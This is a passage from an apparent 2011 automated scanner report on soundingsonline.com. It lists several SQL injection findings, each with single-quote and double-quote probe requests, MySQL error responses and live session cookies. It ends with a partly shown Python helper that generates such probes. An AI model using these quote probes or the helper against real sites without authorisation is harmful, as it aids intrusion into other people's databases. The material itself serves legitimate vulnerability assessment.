<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/yvcomment''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.78. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/yvcomment/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/yvcomment/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.79. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /contact-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /contact-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.80. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.81. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/destinations?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/destinations?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.82. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/in-depth?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/in-depth?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.83. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/justyesterday?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/justyesterday?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.84. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/lifestyle?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/lifestyle?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.85. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/profiles?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/profiles?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.86. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared: MySQL reads '' inside a string literal as an escaped quote, so the statement parses again, which shows the input is being spliced into a quoted SQL literal rather than merely tripping input validation. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Here the error text ends in AND cookie_info='', a column that no request parameter refers to, so the quote is reaching a query the application appears to build for every request (the errors for 1.88 and 1.89 below reproduce the whole request URI inside that query); the injection point is the URL as a whole, not this parameter in particular.

The database appears to be MySQL.

Remediation detail

The application should pass request data, including the request URI and cookie values, to the database only through parameterised queries (prepared statements); escaping one parameter or hiding the error message leaves the injection in place. It should also handle errors gracefully and prevent SQL error messages from being returned in responses, since the message discloses the structure of the failing statement.
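The differential check the scanner applies (one quote produces a MySQL syntax error, two quotes do not) is reproduced below as an added example in Python; it is not part of the scanner output or of the site's code. The two response bodies are constructed from Response 1 and Response 2 of this issue, so the check runs offline; run_check takes an injectable fetch callable for that reason, and the default http_get is the only part that touches the network. The regex also pulls out MySQL's "near '...'" fragment, which is the unparsed remainder of the statement and therefore tells you where in the query the quote landed (here, just before AND cookie_info='').

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urlsplit, urlunsplit

# MySQL's syntax-error text as it appears in the responses above; the
# 'near' fragment is the unparsed remainder of the statement, which tells
# you where the quote landed.
MYSQL_SYNTAX_ERROR = re.compile(
    r"You have an error in your SQL syntax;.*?near '(?P<near>.*?)' at line (?P<line>\d+)",
    re.S,
)


def probe_urls(url, param=None):
    """Return the (single-quote, double-quote) probe URLs for one injection point.

    With param given, the quote is appended to that parameter's value
    (Itemid=111' / Itemid=111''). Without it, a new parameter named 1' / 1''
    is added, which is the scanner's 'name of an arbitrarily supplied
    request parameter' case. Quotes are sent raw, as the scanner sent them.
    """
    parts = urlsplit(url)
    pairs = [p for p in parts.query.split("&") if p]
    urls = []
    for quote in ("'", "''"):
        if param is None:
            new = pairs + [f"1{quote}=1"]
        else:
            new = []
            for p in pairs:
                key, _, value = p.partition("=")
                new.append(f"{key}={value}{quote}" if key == param else p)
        urls.append(urlunsplit(parts._replace(query="&".join(new))))
    return tuple(urls)


def sql_error(body):
    """(near_fragment, line) if the body carries the MySQL syntax error, else None."""
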